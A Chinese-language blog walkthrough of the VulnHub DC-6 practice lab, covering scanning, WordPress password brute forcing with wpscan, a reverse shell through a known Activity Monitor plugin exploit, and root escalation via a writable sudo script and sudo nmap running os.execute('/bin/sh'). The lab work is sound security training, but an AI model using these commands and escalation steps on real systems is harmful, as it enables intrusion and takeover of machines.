• VulnHub DC-6


    1. 🍬 博主介绍
    2. 👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
    3. ✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
    4. 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
    5. 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
    6. 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

    靶场官方提示:

    这个靶场需要具备初中级的渗透测试技巧,这并不是一个很困难的挑战,因此对初学者来说应该很友好,你的最终目标是放在root目录下的flag。

    并且,官方给了一个线索:

    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

    一、信息收集

    1.nmap扫描

    1. ┌──(root💀kali)-[~]
    2. └─# arp-scan -l

    1. ┌──(root💀kali)-[~]
    2. └─# nmap -sS -A -p- 192.168.103.206

    扫描发现开放了22、80端口

    1. ┌──(root💀kali)-[~]
    2. └─# nmap --script=vuln -p22,80 192.168.103.206
    3. --script=vuln 是nmap中的一个模块,能够扫描端口中有哪些漏洞可以利用

    发现了以下有用的信息:

    2.访问web服务

    可以看到:输入IP地址,无法显示web服务,这里一看就知道是DNS服务器无法解析该域名

    所以我们需要修改hosts文件内容,使域名wordy对应IP

    添加hosts

    添加完成以后,可以正常访问web页面了

    1. ┌──(root💀kali)-[~]
    2. └─# vim /etc/hosts
    3. ┌──(root💀kali)-[~]
    4. └─# cat /etc/hosts
    5. 127.0.0.1 localhost
    6. 127.0.1.1 kali
    7. 192.168.103.206 wordy

    但是没有发现什么有价值的信息

    3.目录爆破

    1. ┌──(root💀kali)-[~]
    2. └─# dirsearch -u http://192.168.103.206
    3. #扫到后台登入界面/wp—login.php
    4. 扫描到WP的登录地址,说明我们现在可以利用wpscan进行爆破WP的网站用户和密码

    1. #指定url,枚举其中的用户名
    2. ┌──(root💀kali)-[~/桌面]
    3. └─# wpscan --url http://wordy/ --enumerate u user.txt
    4. #将枚举出的用户名写到user.txt中

    作者最开始提示用kali自带的字典rockyou.txt导出包含k01的密码导出来的字典爆破

    1. ┌──(root💀kali)-[~]
    2. └─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
    3. #用户名和密码字典都有了,开始爆破
    4. wpscan --url wordy -U user.txt -P pwd.txt
    5. #爆破出来账号:mark 密码:helpdesk01

    二、漏洞利用

    这个靶场有两个漏洞点可以利用

    Activity monitor插件

    1.searchsploit

    1. ┌──(root💀kali)-[~]
    2. └─# searchsploit Activity monitor

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# searchsploit -m 45274.html
    3. ┌──(root💀kali)-[~/桌面]
    4. └─# vim 45274.html

    2.反弹shell

    第一步:
    kali侦听:nc -nvlp 1234
    

    第二步:

    kali打开临时的http server服务,以便浏览器访问

    python3 -m http.server 83
    

    第三步:

    浏览器访问http://192.168.103.129/45274.html,点击Submit request,即可反弹Shell到kali

    交互式shell
    python -c 'import pty; pty.spawn ("/bin/bash")'
    

    三、提权

    1.SUID

    1. //查看哪些具有root权限的可执行文件
    2. find / -user root -perm -4000 -print 2>/dev/null

    没有发现什么可以用来提权的可执行文件

    sudo -l没有密码,发现不了什么可以利用的

    2.su graham

    1. 在/home/mark/stuff目录下
    2. 有一个things-to-do.txt的文件下,记录了graham用户和密码
    3. 账户:graham
    4. 密码:GSo7isUM1D4

    发现已经登录成功了:

    3.sudo -l

    1. # 看看当前用户拥有的权限,可以对backups.sh执行写操作
    2. cd /home/jens
    3. # 写入/bin/bash,执行,切换到jens的shell
    4. echo "/bin/bash" >> backups.sh
    5. sudo -u jens ./backups.sh

    1. jens@dc-6:~$ sudo -l
    2. //(root) NOPASSWD: /usr/bin/nmap
    3. #发现可以用root权限执行nmap,nmap在早期版本是可以用来提权的将提权代os.execute("/bin/sh")写入一个文件中。
    4. # nmap提权:以root的权限用nmap执行这个脚本

    4.root权限

    提权网站:

    nmap | GTFOBins icon-default.png?t=N7T8https://gtfobins.github.io/gtfobins/nmap/#sudo

    1. TF=$(mktemp)
    2. echo 'os.execute("/bin/sh")' > $TF
    3. sudo nmap --script=$TF

    5.flag

  • 相关阅读:
    达梦数据库表备份还原的使用介绍及批量备份还原多张表,跨模式备份还原表
    MATLAB中tiledlayout函数使用
    [Ansible专栏]Ansible常用模块介绍和使用
    高等数学(第七版)同济大学 习题7-7 个人解答
    了解三层架构:表示层、业务逻辑层、数据访问层
    leetcode 698. 划分为k个相等的子集
    京东一小伙一年输出20篇专利,其实你也可以
    pytorch深度学习实战lesson22
    【力扣】27. 移除元素
    List-带头结点的双向循环链表
  • 原文地址:https://blog.csdn.net/SENMINGya/article/details/134423809